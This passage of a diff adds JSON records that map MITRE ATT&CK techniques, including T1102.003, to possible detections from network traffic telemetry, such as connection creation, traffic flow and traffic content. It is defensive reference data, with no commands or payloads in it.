"target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1102.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + 